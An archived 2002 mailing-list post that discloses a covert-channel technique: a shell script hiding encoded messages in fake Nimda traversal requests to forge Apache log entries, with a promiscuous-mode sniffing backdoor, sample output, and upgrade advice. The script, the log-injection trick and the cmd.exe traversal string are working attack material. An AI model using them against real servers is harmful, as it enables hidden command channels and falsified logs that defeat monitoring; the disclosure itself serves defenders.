Nimda covert channel

From: RainbowHat (nHiATlE@blSackholeP.mAit.edMu.invalid)
Date: 06/19/02 

From: RainbowHat <nHiATlE@blSackholeP.mAit.edMu.invalid>
Date: Tue, 18 Jun 2002 23:47:23 +0000 (UTC)

Here is a covert channel proof of concept over Nimda imitated packets.
Apache 1.3.24 has released at 22nd March so I decided to post today.
This proof of concept code is about "Methode II".

---[ Methode I

According to CERT Advisory CA-2001-26, Nimda has 16 scan patterns.
Intruder can send informations (commands) overlapped permutation of 16.
You should check your external interface is promiscuous mode or not,
using clean `ifconfig` or other tools with turning off NIDS that used
'libpcap'. Even your httpd responded 404 code, promiscuous mode type
backdoor can receive informations.

---[ Methode II

If intruder use CR:0x0d and LF:0x0a character code trick, they can send
more informations with encrypt (this example is not encrypted but encoded).
You should check the packet size is same as original Nimda or not.

---[ Workaround

Use hex|text viewer|editor, `tr` or `sed` commands filter to view
/var/log/httpd/* log files.

---[ Solution

Update to version above 1.3.24.

+--[ http://httpd.apache.org/ ]---
|Apache 1.3.24 Major changes
|Security vulnerabilities
|* Prevent invalid client hostnames from appearing in the log file.
+---

---[ Proof of concept code

#!/bin/sh
#
# [nimdacov] Nimda covert channel proof of concept
# (promiscuous mode backdoor)
#
# Usage: $ ./nimdacov -s # send message from remote
# # ./nimdacov -r # receive (sniff) message, need root
# $ ./nimdacov # decode message (default)
#
# You need httpd, mimencode, nc (netcat) and hping2.
#
# RainbowHat, NO WARRANTY, educational purpose only.
#
                                        # ___configuration___
Vdev='lo' # external interface device to sniff
Vtgt='127.0.0.1' # target IP
Vloc='+00' # target local time (+00 UTC)
Vlop='' # target log option
#Vlop=' \"-\" \"-\"' # User-Agent, Referer
Vsiz='343' # responded size
Vprt='80' # target port
                                        # my message
Vmsg='Hello, this is Nimda covert channel!'
Vmgc='m491c' # magic number
Vsta="Vmgc:"; Vend=":Vmgc" # magic number start end
Vesc='\r' # escape character
Vnrm='GET / HTTP/1.0' # http normal query
                                        # http Nimda fake query [wrapped]
Vnmd='GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c..
/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0'

rand254() # generate random number 1 to 254
{
        local Lmin=1 Lmax=254
        echo $(ps -ef | md5sum |
        sed "y/abcdef/ABCDEF/;s/^/16i/;s/ .*/ Ai$Lmax $Lmin-1+%$Lmin+p/"|dc)
}

send() # send message
{
                                        # encode base64
        local Lenc="$Vsta$(echo "$Vmsg"|mimencode)$Vend"
                                        # random fake IP
        local Lfip=$(echo $Vtgt | awk -F. '{print $1 FS $2 FS $3 FS}')
        Lfip="$Lfip$(rand254) - - "
                                        # target local time
        local Ldat="[$(date +%d/%b/%Y:%X -ud "$Vloc hours") ${Vloc}00] "
                                        # http query
        local Lreq="$Vnrm$Vesc$Lenc$Vesc$Lfip$Ldat"
        Lreq="$Lreq\"$Vnmd\" 404 $Vsiz$Vlop\r\n\r\n"
                                        # send/connect TCP
        echo -ne "$Lreq" | nc $Vtgt $Vprt
}

receive() # receive message
{
        /usr/sbin/hping2 -I $Vdev -9 $Vsta > nimdacov.rcv
}

decode() # decode message
{
        sed "s/$Vend.*//g" nimdacov.rcv | mimencode -u
}

case z$1 in
        z-s ) # send message
                send;;
        z-r ) # receive message
                receive;;
        * ) # decode message (default)
                decode;;
esac

---[ Results of experimentation

# ./nimdacov -r # make interface promiscuous mode so you need root
$ ./nimdacov -s # (from remote machine)
$ tail /var/log/httpd/access_log
127.0.0.143 - - [14/Jun/2002:17:31:50 +0000] "GET /msadc/..%255c../..%255c
 ../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
 HTTP/1.0" 404 343
$ ./nimdacov
Hello, this is Nimda covert channel! 

-- 
Regards, RainbowHat. To spoof or not to spoof, that is the IPv4 packet.
----+----1----+----2----+----3----+----4----+----5----+----6----+----7

Relevant Pages

  • Nimda covert channel
    ... Here is a covert channel proof of concept over Nimda imitated packets. ... Apache 1.3.24 has released at 22nd March so I decided to post today. ...
    (comp.os.linux.security)
  • Why?
    ... > Here is a covert channel proof of concept over Nimda imitated packets. ... i have spent a lot of time chasing nimda along with other viruses like it. ... Nimda is a viral work of art. ... Whats the point? ...
    (comp.os.linux.security)
  • Why?
    ... > Here is a covert channel proof of concept over Nimda imitated packets. ... i have spent a lot of time chasing nimda along with other viruses like it. ... Nimda is a viral work of art. ... Whats the point? ...
    (comp.os.linux.security)
  • Re: Gotta love the server access logs!
    ... >> for IIS-type requests from worms like Nimda and such, ... >> Appearantly IIS worms are much easier to write and implement than anything ... >> for Apache, or we would see a lot more of that around. ... Don't worry about these nimda type requests. ...
    (comp.os.linux.security)
  • Re: Am i safe now?
    ... Yes you are safe from Nimda and CodeRed ... Apache? ... > Hi all im runing apache2 as a front end server but now i need to use .asp ...
    (microsoft.public.inetserver.iis.security)